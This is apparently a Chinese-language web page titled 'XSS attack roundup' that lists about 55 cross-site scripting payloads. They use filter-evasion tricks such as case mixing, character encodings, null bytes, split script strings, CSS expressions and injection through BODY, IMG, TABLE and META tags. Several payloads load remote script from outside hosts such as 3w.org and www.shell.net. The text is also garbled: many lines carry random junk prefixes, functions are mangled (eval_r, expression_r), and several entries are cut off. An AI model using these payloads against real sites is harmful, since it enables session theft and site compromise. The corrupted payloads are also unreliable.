XSS攻击汇总

admin

(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(99)另类弹框
5 V! l- c$ I: O3 L) T0 Q$ c<q/oncut=alert()>1
: y) B" J1 y- O8 e<s/onclick=alert()>b
1 Q3 r* t0 n* q- _: u" f5 B <XSS=" onclick="alert(1)//">clickme</SSX=">
, A4 }/ b) k9 }6 C! ]5 C3 F <zzz onclick=alert`1`>clickme</zzz>
9 g5 H; ]5 ~+ u; h, q; d <a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
! Y6 c1 J  O- ~) K# u0 E# N<z onclick=alert`1`>clickme</z>
; M  u5 G$ f, G
0 {7 Z5 D5 @7 X* {: D(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
  l, {3 i6 J% x# Y0 X; X- F& a
* m/ O) f, G) m  P( _1 P( ]" r& r(3)IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>
9 s4 {6 h! ]9 f( w- l$ {; [
(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

2 O! T* Z, g* q7 A2 m  u(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>

9 W3 }/ B2 r  Q$ F(6)修正缺陷IMG标签
2 D& d, C. K( _0 a, B<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7)formCharCode标签(计算器)
! F2 N, P( p% o0 t! Q  K/ |% @  c<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>
/ X# Z/ D4 U# x( r
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>

(10)十六进制编码也是没有分号(计算器)
<IMG SRC=\'#\'" /span>

% j  w1 b) Z7 a(11)嵌入式标签,将Javascript分开
6 E. Z* u3 s, c$ D! i<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

(12)嵌入式编码标签,将Javascript分开
! S& I1 c6 H" |  _0 w& K: O& V<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
$ i  s8 l8 }8 K/ u
/ r: m0 I& h' w/ F(13)嵌入式换行符
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
# ^$ a9 q1 q9 l: N/ ]
0 T8 B- h3 Z: X( M(14)嵌入式回车
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC=\'#\'" /span>

(16)解决限制字符(要求同页面)
  P5 c$ f7 k& Z9 e# [( V! ~<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
) W! g& ], B& x9 v$ V! n<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
* N% Z- b/ l% @5 W<script>z=z+’ript>”)’</script>
! L( P: k- ^: y& P9 ]$ e8 S<script>eval_r(z)</script>
" N' |0 y3 A) p9 V, ~- c
(17)空字符
+ }# K% s  A1 D, y$ ^perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
4 X5 ?( I2 ]+ U1 A4 O, \
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
. R  H0 J" s" o+ H3 U- Iperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

1 ~/ x' V: i+ P(19)Spaces和meta前的IMG标签
  @! \* ]$ P! X# N- d& e5 g<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
9 f( J6 C) p: W1 U
& q3 o2 O% l0 j' o; ]2 k( P(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
" U8 n7 e1 b7 T5 l. @9 [
; P: ~: \2 a" W9 J0 h3 z$ a(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
3 P5 K8 L' X3 U7 Z% j+ e
(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
7 _( p% ~8 Q# m% g" d3 z
8 x5 l, a) h! R& ]& j5 S% T# z(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
6 i' n$ E  ^0 W' x; a4 L0 i
( C$ X. H* u) E% R(24)无结束脚本标记(仅火狐等浏览器)
6 [% a2 b+ E2 \<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
: _) G5 S8 t) j7 z  d
(25)无结束脚本标记2
% \% {* _+ B  m. {% {<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)半开的HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

. `" T9 d. b9 e& M1 m1 D(27)双开角括号
; B% F, o9 E0 [+ _# x8 ?  M2 j$ n<iframe src=http://3w.org/XSS.html <
& P9 P" {: B" ^- l% N7 ]! r! {
- w- D* `0 X3 N  o3 e, Y(28)无单引号 双引号 分号
) D$ W6 [: s, J4 e: K3 ]9 o5 a<SCRIPT>a=/XSS/
* @5 t' b7 I# ?alert(a.source)</SCRIPT>
3 V1 y/ Y8 R0 H0 c! ~- [
(29)换码过滤的JavaScript
0 ]/ j) A; l9 C\”;alert(‘XSS’);//
/ Q+ q, l* c7 Z1 A) I; B4 T
(30)结束Title标签
9 k$ _( c$ @5 [) i1 s( K</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

+ o# b# o  u! X! k8 |# {7 I(31)Input Image
<INPUT SRC=\'#\'" /span>

(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
' z  k* v8 h7 R
- C+ ]$ K* h0 x9 A3 J! s0 p(33)BODY标签
<BODY(‘XSS’)>

(34)IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35)IMG Lowsrc
( Q! S1 ~5 C: l' J<IMG LOWSRC=\'#\'" /span>

5 t1 u% `3 t# s  g- X(36)BGSOUND
<BGSOUND SRC=\'#\'" /span>
, s& ?4 n6 U4 z8 K' w
(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

(38)远程样式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
- o0 _( T3 u) F( b1 a
(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
4 J$ o& q% n. W. e3 i6 Z
(40)IMG VBscript
( N1 q( F3 j5 `2 S* c  G<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

/ k; ?- G1 q9 H( l(41)META链接url
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
$ u$ d: b* N: P$ _8 J* W# L
1 b+ b% y$ `0 Y1 K. s( ^4 A(42)Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43)Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
' l+ x: ?) x% a" y
(44)Table
/ _) j  i6 z% s5 X6 A. d<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

! {9 O" u) z- n# J(45)TD
' z2 g. D" ~. l. u3 _<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

; F7 B* E5 Y7 @1 \/ F(46)DIV background-image
3 S: C' E5 m0 G7 `8 ]<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

$ \1 {" M  L5 n/ M2 T(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
/ D$ w- l3 Q, x3 }; _8 k1 X' G<DIV STYLE=”background-image: url(
javascript:alert(‘XSS’))”>
( N* m, C, j! ^4 a0 m  j2 u
& D% [9 `% B5 G/ d(48)DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
) Y( L! s  {4 h! `
5 h* j0 b2 J% v) e2 {3 w7 R; s  N(49)STYLE属性分拆表达
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

( u7 _; L6 L! k: S7 |3 ?+ x(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
3 N8 @/ r% ?- E) L; f' p5 N( ~3 W
0 }$ x4 Y/ b1 t4 \: W2 `9 j, N+ D(51)STYLE background-image
) Z+ l$ _2 H  B4 A; ]' V- b<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>

(52)IMG STYLE方式
exppression(alert(“XSS”))’>
( @- @  F0 o8 Y2 ~4 O
(53)STYLE background
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
3 i. h. D: M" i9 G6 l$ x5 F' U
(54)BASE
8 i+ h" q  W) k8 \# ~<BASE HREF=”javascript:alert(‘XSS’);//”>

5 H1 L( _) s7 D! Q(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>